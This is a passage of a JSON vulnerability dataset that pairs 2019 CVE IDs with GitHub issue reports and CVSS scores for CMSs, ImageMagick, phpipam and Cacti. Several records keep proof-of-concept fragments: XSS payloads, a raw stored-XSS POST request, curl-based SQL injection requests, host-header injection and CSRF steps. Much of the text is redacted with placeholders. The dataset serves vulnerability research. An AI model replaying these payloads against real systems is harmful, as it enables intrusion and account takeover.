        "description": "About APITAG NUMBERTAG APITAG Header Injection. Host header injection vulnerability found on APITAG NUMBERTAG Using this attack, a malicious user can poison the web cache or arbitrary user re direction. APITAG Test Environment: Windows NUMBERTAG SP NUMBERTAG bit) XAMPP NUMBERTAG APITAG NUMBERTAG Access Path: PATHTAG root APITAG curl URLTAG H APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG {padding NUMBERTAG margin NUMBERTAG body{background: fff;color NUMBERTAG font APITAG APITAG Sans APITAG APITAG Micro APITAG serif;} msg{border NUMBERTAG px solid APITAG NUMBERTAG p NUMBERTAG px;padding NUMBERTAG px;line height NUMBERTAG px;text align:center;font size NUMBERTAG px;background: fff;} msgtit{height NUMBERTAG px;line height NUMBERTAG px;color: fff;background NUMBERTAG eb NUMBERTAG e;} msgbody{margin NUMBERTAG p NUMBERTAG text align:center} info{margin bottom NUMBERTAG px;} msgbody p{font size NUMBERTAG px;} msgbody p a{font size NUMBERTAG px;color NUMBERTAG text decoration:none;} msgbody p a:hover{color NUMBERTAG a NUMBERTAG de;} APITAG APITAG APITAG APITAG APITAG \u63d0\u793a\u4fe1\u606f APITAG APITAG APITAG \u8bf7\u5148\u767b\u5f55\uff01 APITAG APITAG \u672c\u9875\u9762\u5c06\u5728 APITAG NUMBERTAG APITAG \u79d2\u540e\u8df3\u8f6c... APITAG APITAG APITAG APITAG APITAG root APITAG FILETAG Or if we capture this in burp: FILETAG Then follow redirection FILETAG This will be re directed to APITAG with ERRORTAG responds. Capture the responds and open the browser will show following: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16642",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/6",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/6",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2019-09-17T04:45:42Z",
        "description": "tuzicms APITAG I can't insert image to github NUMBERTAG PATHTAG ERRORTAG line NUMBERTAG and line NUMBERTAG This is a APITAG EXP: APITAG NUMBERTAG PATHTAG ERRORTAG line NUMBERTAG and line NUMBERTAG is a APITAG EXP: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16643",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/54",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/54",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2019-09-20T01:05:24Z",
        "description": "There is a stored XSS in the article_edit area.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-16655",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/441",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/441",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2019-09-03T04:56:06Z",
        "description": "joyplus APITAG is a reload vulnerability in CMS NUMBERTAG describe\uff1a There is a reload vulnerability in APITAG the installation file was not deleted\u3002An attacker can overwrite the original system database and content by reinstalling the system\u3002 url\uff1a URLTAG NUMBERTAG main body First open install FILETAG stand alone next FILETAG Re enter yourself data FILETAG end\uff0creload vulnerability FILETAG NUMBERTAG Code audit The deletion was commented by the author. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16656",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/442",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/442",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2019-09-03T05:29:10Z",
        "description": "joyplus cms has code execution FILETAG NUMBERTAG describe\uff1a Code execution is possible due to a system reload vulnerability\u3002 This vulnerability can be getshell. url\uff1a URLTAG NUMBERTAG main body First create a name in the database\uff0cthe name is APITAG FILETAG Definition of database name using system reload vulnerabilities and next FILETAG Back to the previous step Enter payload again payload is APITAG APITAG \" and next FILETAG end FILETAG NUMBERTAG Code audit FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16657",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/5",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/5",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2019-09-03T08:02:42Z",
        "description": "tuzicms PATHTAG has xss NUMBERTAG tuzicms PATHTAG has xss NUMBERTAG PATHTAG (\"dudu\") PATHTAG NUMBERTAG end FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16658",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/4",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/4",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2019-09-03T07:52:11Z",
        "description": "tuzicms PATHTAG Cross station Request Forgery exists in the place of announcement management under conventional management NUMBERTAG Cross station Request Forgery exists in the place of announcement management under conventional management PATHTAG FILETAG NUMBERTAG payload\uff1a CODETAG NUMBERTAG end FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16659",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/3",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/3",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2019-09-03T07:47:24Z",
        "description": "APITAG site Request Forgery exists in routinely managed friendship links NUMBERTAG APITAG site Request Forgery exists in routinely managed friendship links FILETAG NUMBERTAG payload: CODETAG NUMBERTAG end FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16660",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/440",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/440",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2019-09-03T04:37:51Z",
        "description": "joyplus cms Cross site Request Forgery exists in the Player Management Office of System Management NUMBERTAG Cross site Request Forgery exists in the Player Management Office of System Management APITAG FILETAG payload\uff1a CODETAG end: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16661",
        "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/42",
        "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/42",
        "Repo_new": "n00dles/ogma-CMS",
        "Issue_Created_At": "2019-09-20T05:35:42Z",
        "description": "APITAG in ogma CMS NUMBERTAG iew Blogs Create New Blog Post. Affected software:ogma CMS NUMBERTAG Type of vulnerability: XSS APITAG APITAG Blogs Create New Blog Posthas APITAG payload\uff1a\"> APITAG alert NUMBERTAG APITAG aaaa click Create New Blog Post FILETAG Enter payload in the title of the page FILETAG save FILETAG Access page\uff1a URLTAG FILETAG Success",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-16664",
        "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/20",
        "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/20",
        "Repo_new": "thinksaas/thinksaas",
        "Issue_Created_At": "2019-09-21T13:23:47Z",
        "description": "Stored xss when administrator edits posts in the same group, or just click a url. Stored xss when administrator edits posts in the same group, or just click a url APITAG Ways to reproduce NUMBERTAG admin1 creates a new group with the following request, notice that the malicious code has been injected in groupname param. APITAG POST APITAG HTTP NUMBERTAG Host: youdomain User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Cookie: Connection: close Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"groupname\" APITAG NUMBERTAG Content Disposition: form data; name=\"groupdesc\" aaaaaaaaaaaaaaa NUMBERTAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"tag\" aaaaaaaaaaaaaaa NUMBERTAG Content Disposition: form data; name=\"token\" APITAG NUMBERTAG admin1 invites admin2 as an administrator of this new group and post anything. PS: without agreement, one could invite anyone as his group adminstrator. APITAG NUMBERTAG once admin2 edits any posts in this group, or just click: URLTAG APITAG admin2 would execute the js code which had been injected in the group name NUMBERTAG admin2\u7ba1\u7406\u7ec4\u5185\u5e16\u5b50\u65f6\uff0c\u6216\u53ea\u662f\u70b9\u51fburl\uff1a URLTAG {\u4f60\u7684topic id\uff0c\u5f88\u5bb9\u6613\u83b7\u53d6} admin2\u5c06\u6267\u884c\u5df2\u7ecf\u88ab\u5d4c\u5165groupname\u4e2d\u7684js\u4ee3\u7801",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-16665",
        "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/21",
        "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/21",
        "Repo_new": "thinksaas/thinksaas",
        "Issue_Created_At": "2019-09-21T13:26:46Z",
        "description": "Stored XSS in comments post. Stored XSS in comments post \u53d1\u8868\u8bc4\u8bba\u5904\u5b58\u50a8\u578bxss The comment part is vulnerable with js injected svg xss, which malicious js code may get executed. APITAG Ways to reproduce NUMBERTAG comment on any posts with malicious js code injected, like following NUMBERTAG POST APITAG HTTP NUMBERTAG Host: youdomain User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: Connection: close content= APITAG APITAG NUMBERTAG a alert box would pop, thus js code has been excuted NUMBERTAG js\u4ee3\u7801\u5df2\u7ecf\u6210\u529f\u6267\u884c",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16669",
        "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/935",
        "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/935",
        "Repo_new": "pagekit/pagekit",
        "Issue_Created_At": "2019-09-18T08:14:46Z",
        "description": "Security issue Pagekit's request password feature allows user acc enumeration. APITAG Problem Hi, When a user is requesting to reset his password using a valid email account, Pagekit gives the following response. FILETAG However, when an invalid email account is submitted, Pagekit notifies user that the particular email account cannot be found. FILETAG Leveraging on this, the attacker can use a list of emails to enumerate the valid user accounts based on the response of the server. Recommendation: It is recommended to give generic responses when user inputs his email address for recovery e.g. \"If this email exists, you will receive an email with the reset instructions.\" in order to prevent user account enumeration. OWASP ref: URLTAG Technical Details Pagekit version NUMBERTAG Webserver: APITAG Database: APITAG PHP Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16677",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/76",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/76",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-09-02T14:06:28Z",
        "description": "A Sensitive operation CSRF vulnerability exists in iCMS NUMBERTAG Hello, a sensitive CSRF vulnerability was found in the background deletion administrator account. vulnerability url: URLTAG When I am missing CSRF_TOKEN and can still request normally, CSRF vulnerability exists vulnerability poc: CODETAG When POC is executed, all administrators except the initial administrator will be deleted\u3002 Hope it can help you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16678",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/27",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/27",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-09-20T08:57:08Z",
        "description": "Denial of service attack caused by CSRF(CSRF\u9020\u6210\u7684\u62d2\u7edd\u670d\u52a1\u653b\u51fb). Hello, I found a vulnerability in your application. I call it a denial of service attack caused by CSRF. The point of vulnerability is the URL rule configuration. When I use CSRF to configure an illegal rule for administrators, the access routing of the whole station will be changed. That is to say, it is totally inaccessible and the site is in ERRORTAG status. APITAG priority is higher than the original admin/et al route). Attacks are shown as follows: No token check is used at the setup route. FILETAG the poc is: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG When the POC is executed, all routes of the site URLTAG are directed to URLTAG And we can define multiple routes in a link, so that all routes are customized and the whole station will crash so that it cannot be accessed. FILETAG FILETAG FILETAG FILETAG In Chinese\uff1a APITAG ERRORTAG \u72b6\u6001\u3002\uff08\u5176\u4f18\u5148\u7ea7\u9ad8\u4e8e\u539f\u672c\u7684admin/\u7b49\u8def\u7531\uff09\u3002 \u653b\u51fb\u5c55\u793a\u5982\u4e0b\uff1a FILETAG the poc is: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u5728\u8bbe\u7f6e\u8def\u7531\u5904\u672a\u4f7f\u7528token\u6821\u9a8c\uff0c APITAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16679",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/33",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/33",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-08-04T06:34:40Z",
        "description": "Authenticated Local File Inclusion(LFI) in fm module. Hello Team, When I'm using the application, I observed that application is vulnerable to APITAG File Inclusion) vulnerability. an only authenticated user can perform this exploit remotely. Step to reproduce the Vulnerability Login into the application as an admin user or equivalent user and go the below link APITAG FILETAG To fix the Vulnerability If possible, do not permit appending file paths directly. Make them hard coded or selectable from a limited hard coded path list via an index variable. If you definitely need dynamic path concatenation, ensure you only accept required characters such as \"a Z NUMBERTAG and do not allow \"..\" or \"/\" or NUMBERTAG null byte) or any other similar unexpected characters. It is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure any potential attack cannot perform a directory traversal attack. Tested on Windows NUMBERTAG AMPP version NUMBERTAG Gila CMS Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-16692",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2738",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2738",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2019-09-16T09:18:53Z",
        "description": "Five sql injections on All Phpipam Versions.. Describe the bug Five sql injections on All phpipam APITAG vulnerable files are PATHTAG APITAG version All phpipam Versions. vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure We can find APITAG APITAG info in response content. rsp: APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG APITAG compressed insecure rsp: The time of response is more than NUMBERTAG s. vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure rsp: APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG ' compressed insecure rsp APITAG SQLSTATE[HY NUMBERTAG General error NUMBERTAG PATH syntax error: APITAG APITAG APITAG Filter saved APITAG % vulnerability NUMBERTAG req: curl ' FILETAG H APITAG Agent: Mozilla NUMBERTAG APITAG NUMBERTAG H APITAG APITAG table page size NUMBERTAG d 'action=add&table=users APITAG &current NUMBERTAG next NUMBERTAG compressed insecure",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16703",
        "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/7",
        "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/7",
        "Repo_new": "gaozhifeng/phpmywind",
        "Issue_Created_At": "2019-09-04T06:06:50Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the NUMBERTAG No security check in page PATHTAG FILETAG When I add a new article, I use \" APITAG alert(/xss/) APITAG \" as the title FILETAG then back to the PATHTAG FILETAG background page executed a javascript script Fix: Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on. Verify the data type and verify its format, length, scope, and content. Not only need to be verified on the client side but also on the server side. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16704",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/1",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/1",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-09-05T09:16:35Z",
        "description": "PHPMYWIND CMS XSS. After logging in to the management page using the ADMIN account, you can insert the JAVASCRIPT code in multiple editable places and affect the home page display. Take PATHTAG as an example Step NUMBERTAG open page PATHTAG login use admin accont FILETAG Step NUMBERTAG open page PATHTAG FILETAG Step NUMBERTAG Enter APITAG at the title and save FILETAG Step NUMBERTAG refresh FILETAG Javascript code is executed FILETAG Other vulnerable page steps are consistent with the above ,then not described one by one. The background of the website application is not protected.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-16705",
        "Issue_Url_old": "https://github.com/libming/libming/issues/178",
        "Issue_Url_new": "https://github.com/libming/libming/issues/178",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2019-02-28T08:05:46Z",
        "description": "Heap Buffer Overflow (OOB Read) in function APITAG decompile.c NUMBERTAG Description An out of bound read was found in function APITAG (file util/decompile.c NUMBERTAG Details: ERRORTAG poc file URLTAG Credit APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16706",
        "Issue_Url_old": "https://github.com/wangyifani/kkcms/issues/1",
        "Issue_Url_new": "https://github.com/wangyifani/kkcms/issues/1",
        "Repo_new": "wangyifani/kkcms",
        "Issue_Created_At": "2019-10-17T01:47:34Z",
        "description": "search.php exist XSS. XSS exists in homepage search function FILETAG input payload \"> APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16708",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1531",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1531",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-27T08:51:13Z",
        "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description ERRORTAG Steps to Reproduce APITAG then close the windows of APITAG System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16710",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1528",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1528",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-25T09:50:16Z",
        "description": "memory leaks. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description memory leaks in APITAG ERRORTAG Steps to Reproduce ./magick composite input1 input2 output.aai System Configuration APITAG ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG NUMBERTAG configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" APITAG version NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16711",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1542",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1542",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-11T02:03:07Z",
        "description": "memory leak in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description ERRORTAG Steps to Reproduce PATHTAG composite Memory Leak input1 Memory Leak input2 output.ps2 System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Mon No NUMBERTAG UTC NUMBERTAG APITAG Additional information: ' ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared' APITAG testcase: FILETAG reporter: APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16712",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1557",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1557",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-28T04:35:49Z",
        "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG NUMBERTAG ERROR: APITAG detected memory leaks CODETAG Steps to Reproduce APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Mar NUMBERTAG UTC NUMBERTAG APITAG Additional information: ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared teatcase:[ FILETAG credit by APITAG of Venustech APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16713",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1558",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1558",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-04-28T04:48:48Z",
        "description": "memory leaks in APITAG Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ERRORTAG Steps to Reproduce APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Mar NUMBERTAG UTC NUMBERTAG APITAG Additional information: ./configure CC=\"gcc\" CXX=\"g++\" CFLAGS=\" g fsanitize=address\" disable shared testcase: FILETAG report by APITAG of Venustech APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16723",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2964",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/2964",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2019-09-22T16:37:05Z",
        "description": "Serious security issue allows to view all graphs. I have created a user with no group membership. Graph permission default is DENY and I have selected all graphs Restricted instead of NUMBERTAG I have device params default DENY and only set to specific one. Template perm is set to DENY. Tree Perms is also default DENY and I set to access only a specific one. When I login with that user I see only one option in tree and when I click on the device I see the graph. Everything is fine. But if I take the url APITAG and change the local_graph_id with another value ie NUMBERTAG I get a response and inside that response I see the image which is base NUMBERTAG If I decode and create png I can see the other graph that I dont have permission to see. I tried to update to latest cacti NUMBERTAG and it still get that security issue. I also checked the source code carefully and I don't see any permission check regarding graphs. For example I see permission check for tree node creation but not for graphs.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16747",
        "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/33",
        "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/33",
        "Repo_new": "matrixssl/matrixssl",
        "Issue_Created_At": "2019-07-25T10:42:31Z",
